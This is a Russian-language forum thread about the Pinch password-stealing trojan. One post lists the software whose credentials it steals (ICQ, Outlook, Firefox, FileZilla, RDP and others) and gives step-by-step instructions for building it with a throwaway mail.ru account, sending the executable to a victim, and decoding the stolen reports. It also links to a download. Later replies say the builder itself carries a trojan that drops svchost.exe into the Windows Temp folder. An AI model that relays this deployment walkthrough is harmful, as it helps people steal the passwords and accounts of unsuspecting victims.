Foxter.ru - Пинч

Foxter.ru (https://www.foxter.ru/index.php)

- Сетевая безопасность (https://www.foxter.ru/forumdisplay.php?f=72)

- - Пинч (https://www.foxter.ru/showthread.php?t=3872)

Кто нибуть может? донести до моего ума :angel: че такое пинч и с чем его едят, ни че ни понимаю:mad: а хотелось бы;)

Цитата:

Pinch - это троянская программа, написанная на языке Ассемблера (masm), обладающая маленьким размером (около 20кб) и потрясающими возможностями.
Среди возможностей: похищение паролей от программ (im, mail, ftp, browser, etc).
Так же есть функции удаленного контроля, доступ к файловой системе, socks5, proxy, отправки скриншота, кейлоггер и другое.

Все полученные пароли высылаются одним файлом и затем расшифровываются специальной программой(Parser'ом).

Ворует пароли от:
- ICQ 99B-2002a
- ICQ 2003/Lite/5/Rambler
- Miranda IM
- TRILLIAN
- &RQ, RnQ, The Rat
- QIP
- GAIM
- MSN & Live Messenger
- The Bat!
- MS Office Outlook
- Mail.Ru Agent
- Becky
- Eudora
- Mozilla Thunderbird
- Gmail Notifier
- Opera
- Protected Storage(IE,Outlook Express)
- Mozilla Browser
- Mozilla Firefox
- RAS
- E-DIALER
- VDialer
- FAR
- Windows/Total Comander
- CuteFTP
- WS FTP
- FileZilla
- Flash FXP
- Smart FTP
- Coffee Cup FTP
- RapGet
- USDownloader
- RDP (Windows Remote Desktop(mstsc))

Инструкция:
1. Скачиваем архив
2. Регистрируем левое мыло на Mail.ru
3. Запускаем pinch3 Builder.exe конфигурируем
3.1. в поле E-Mail вводим мыло которое только что зарегели на мейл.ру
3.2. в поле User вводим логин от мыла (например: если зарегели 123@mail.ru То вводим 123)
3.3. вводим пароль от мыла которое недавно зарегестрировали
3.4. в другом поле E-Mail (Там где Reciever) вводим свой адрес куда слать отчеты
3.5. убираем галочку Compress Build....
3.6. Жмем кнопочку Build
4. Остальное можно не трогать
5. Запускаем сохраненный exe или засылаем жертве на твое мыло должен прийти report.bin(или как указал в билдере)
6. вставляешь файлик в C:\reports\ (если нету создай)
7. Запускай Parser2.exe и наслаждайся

Download

Благодарность :)))

J.Carot Благодарю,что так подробно обяснил! Тока вот у меня при скачивании антивирь задергался:mad: че делать игнарировать? Если не сложно скинь свою асю :rolleyes:

Цитата:

Сообщение от splinter (Сообщение 36788)

Поясни плиз концовочку если не сложно:confused: Запускаем сохраненный exe или засылаем жертве на твое мыло? должен прийти report.bin(или как указал в билдере)
вставляешь файлик в C:\reports\ (если нету создай)
Запускай Parser2.exe и наслаждайся :rolleyes:

Цитата:

Сообщение от splinter (Сообщение 36789)

Там все написано, причем понятней некуда,что еще объяснить )
Да многие программы такого контингента вопроинимаются антивирусами как опасная программа-вирус, к сожалению я ничего тебе конкретного про нею не могу больше сказать т.к. писал ее не я.

Цитата:

Сообщение от J.Carot (Сообщение 37376)

Да и исходников как я знаю нет в открытом доступе. ;)

http://ifolder.ru/591392 файл с подставой!!! В пинч билдере троян же сидит. То есть при попытке запуска файла pinch3 Builder.exe, запускается троян вшитый в pinch3 Builder.exe, и отправляются ваши пароли далеко далеко...

Цитата:

Сообщение от sniper1

В пинч билдере троян же сидит. То есть при попытке запуска файла pinch3 Builder.exe, запускается троян вшитый в pinch3 Builder.exe, и отправляются ваши пароли далеко далеко...

ээээ... ты это.. сам то понял что написал?! Читал описание программы-то?!

Цитата:

Сообщение от J.Carot

Pinch - это троянская программа

Да блин не понятно чтоль? посмотри файл pinch3 Builder.exe
Размер 151 КБ (154*624 байт) А должен быть размер 82,5 КБ (84*497 байт)
В ваш файл что дали вшит троян ПИНЧ....

При запуске вашего файла pinch3 Builder.exe файл распаковывается сюда
C:\WINDOWS\Temp
там создаются два файла svchost.exe(троян который отсылает ваши пассы) и сам pinch3 Builder.exe нормального размера....

Ещё нужна информация? теперь то верите?

Цитата:

Сообщение от sniper1 (Сообщение 37586)

Я непойму, откуда ты знаешь какой размер должен быть у программы, у тебя есть оригинал, прикрепи его как вложение и мы сравним разницу.